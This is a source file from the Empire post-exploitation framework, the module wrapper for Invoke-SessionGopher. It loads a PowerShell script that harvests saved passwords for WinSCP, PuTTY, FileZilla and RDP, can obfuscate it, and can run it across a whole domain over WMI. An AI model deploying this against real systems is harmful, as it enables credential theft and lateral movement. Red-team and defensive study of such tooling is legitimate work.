Empire/lib/modules/powershell/credentials/sessiongopher.py

142 lines
5.8 KiB
Python
Raw Normal View History

2017-05-08 02:11:32 +00:00
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Invoke-SessionGopher',
2017-05-08 02:55:11 +00:00
# List of one or more authors for the module
2017-05-08 02:11:32 +00:00
'Author': ['@arvanaghi, created at FireEye'],
2017-05-08 02:55:11 +00:00
# More verbose multi-line description of the module
2017-05-08 02:11:32 +00:00
'Description': ('Extract saved sessions & passwords for WinSCP, PuTTY, SuperPuTTY, FileZilla, '
'RDP, .ppk files, .rdp files, .sdtid files'),
# True if the module needs to run in the background
2017-05-08 02:55:11 +00:00
'Background': False,
2017-05-08 02:11:32 +00:00
# File extension to save the file as
2017-05-08 02:55:11 +00:00
'OutputExtension': None,
2017-05-08 02:11:32 +00:00
# True if the module needs admin rights to run
2017-05-08 02:55:11 +00:00
'NeedsAdmin': False,
2017-05-08 02:11:32 +00:00
# True if the method doesn't touch disk/is reasonably opsec safe
2017-05-08 02:55:11 +00:00
'OpsecSafe': True,
# The language for this module
'Language': 'powershell',
2017-05-08 02:11:32 +00:00
# The minimum PowerShell version needed for the module to run
2017-05-08 02:55:11 +00:00
'MinLanguageVersion': '2',
2017-05-08 02:11:32 +00:00
# list of any references/other comments
'Comments': [
2017-05-08 02:55:11 +00:00
'Twitter: @arvanaghi | ',
'https://arvanaghi.com | ',
2017-05-08 02:11:32 +00:00
'https://github.com/fireeye/SessionGopher',
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to run module on.',
2017-05-08 02:11:32 +00:00
'Required' : True,
'Value' : ''
},
'Thorough' : {
'Description' : 'Switch. Searches entire filesystem for .ppk, .rdp, .sdtid files. Not recommended to use with -AllDomain due to time.',
'Required' : False,
'Value' : ''
},
'u' : {
'Description' : 'User account (e.g. corp.com\jerry) for when using -Target, -iL, or -AllDomain. If not provided, uses current security context.',
'Required' : False,
'Value' : ''
},
'p' : {
'Description' : 'Password for user account (if -u argument provided).',
'Required' : False,
'Value' : ''
},
'Target' : {
'Description' : 'Provide a single host to run remotely against. Uses WMI.',
'Required' : False,
'Value' : ''
},
'o' : {
'Description' : 'Switch. Drops a folder of all output in .csvs on remote host.',
'Required' : False,
'Value' : ''
},
'AllDomain' : {
'Description' : 'Switch. Run against all computers on domain. Uses current security context, unless -u and -p arguments provided. Uses WMI.',
'Required' : False,
'Value' : ''
},
'iL' : {
'Description' : 'Provide path to a .txt file on the remote host containing hosts separated by newlines to run remotely against. Uses WMI.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
2017-06-19 05:46:30 +00:00
def generate(self, obfuscate=False, obfuscationCommand=""):
2017-05-08 02:11:32 +00:00
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-SessionGopher.ps1"
2017-06-19 05:46:30 +00:00
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
2017-05-08 02:11:32 +00:00
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
2017-06-19 05:46:30 +00:00
scriptEnd = "Invoke-SessionGopher"
2017-05-08 02:11:32 +00:00
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
2017-06-19 05:46:30 +00:00
scriptEnd += " -" + str(option)
2017-05-08 02:11:32 +00:00
else:
2017-06-19 05:46:30 +00:00
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
2017-05-08 02:11:32 +00:00
return script